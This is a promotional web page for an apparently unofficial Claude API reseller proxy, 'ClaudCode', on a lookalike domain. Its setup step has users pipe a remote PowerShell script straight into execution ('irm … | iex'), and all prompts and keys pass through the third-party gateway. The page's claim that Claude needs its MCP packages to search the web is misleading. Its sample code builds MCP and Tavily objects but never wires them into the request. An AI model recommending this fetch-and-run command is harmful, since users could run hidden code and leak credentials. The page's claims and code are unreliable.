Premium access to Claude Opus 4.6, Sonnet 4.6 & Haiku 4.5. Per-key budgets, real-time analytics, streaming support — all wrapped in a blazing-fast API proxy you can plug into any SDK.
Everything you need to distribute, manage, and monitor Claude API access — without the complexity.
Assign individual budgets per API key with rolling 5-hour windows. Perfect for managing teams, clients, or resellers.
Every request is logged with model info, token counts, latency, and status. Monitor usage patterns in real-time.
Full Server-Sent Events pass-through. Get token-by-token streaming responses with zero overhead or buffering.
Each API key operates in its own sandbox with independent rate limits, budgets, and permissions. Zero cross-contamination.
Works instantly with the official Anthropic SDK. Just swap the base URL and you're live. No code changes needed.
Automatic prompt caching reduces repeated token costs. Same prompt? Cached response. Save tokens and money effortlessly.
Access the full Claude family through a single gateway. Switch models per request — no config changes needed.
The most powerful Claude model. Ideal for complex reasoning, code generation, advanced analysis, and multi-step tasks.
The perfect balance of speed and intelligence. Great for everyday coding, writing, and conversation tasks.
Ultra-fast responses for simple tasks. Perfect for chat, classification, extraction, and high-volume workloads.
One PowerShell command sets up your entire project. Or configure manually — your choice.
Run our PowerShell setup script to instantly scaffold a new project with the Anthropic SDK, environment config, and example files — all pre-configured for the ClaudCode gateway.
The script will:
# Run this in PowerShell to set up everything automatically
irm https://claudcode.top/setup.ps1 | iexPrefer manual control? Install the SDK, swap the base URL to our gateway, and you're connected. Works with any existing Anthropic project.
npm install @anthropic-ai/sdk
# Then in your code:
import Anthropic from "@anthropic-ai/sdk";
const client = new Anthropic({
apiKey: "sk-cc-xxxxxxxxxxxx",
baseURL: "https://api.claudcode.top/v1",
});Start making API calls. Streaming, tool use, vision — everything works exactly like the official Anthropic API. Zero code changes needed.
const response = await client.messages.create({
model: "claude-opus-4-6",
max_tokens: 4096,
messages: [
{
role: "user",
content: "Explain quantum computing"
}
],
stream: true,
});
for await (const event of response) {
if (event.type === "content_block_delta") {
process.stdout.write(event.delta.text);
}
}node index.js# Test connectionnode stream.js# Test streamingBoth files are auto-generated by the setup script with your API key pre-configured.
The official Anthropic SDK does not include MCP (Model Context Protocol) support. Without it, Claude cannot perform web searches, fetch live data, or connect to external tools. ClaudCode solves this with @hono/mcp + tavily-mcp for advanced AI-powered web search, extraction & crawling.
npm install @hono/mcp tavily-mcpimport { McpServer } from "@hono/mcp";
import { TavilyMcp } from "tavily-mcp";
import Anthropic from "@anthropic-ai/sdk";
const client = new Anthropic({
apiKey: "sk-cc-xxxxxxxxxxxx",
baseURL: "https://api.claudcode.top/v1",
});
// MCP server — connects Claude to external tools
const mcp = new McpServer({
name: "claudcode-mcp",
version: "1.0.0",
});
// Tavily — AI-powered search, extract & crawl
const tavily = new TavilyMcp({
apiKey: process.env.TAVILY_API_KEY,
});
// Claude can now search the web, extract content
// from URLs, and crawl sites in real-time
const response = await client.messages.create({
model: "claude-opus-4-6",
max_tokens: 4096,
messages: [
{
role: "user",
content: "Search the web for latest AI news"
}
],
});Note:Both packages are required for search & live-data functionality. Anthropic's official SDK alone cannot perform web searches — @hono/mcp provides the protocol layer and tavily-mcppowers the actual search, extraction & crawling.
Invite-only access to Claude Opus 4.6, Sonnet 4.6, and Haiku 4.5 — all through one reliable gateway.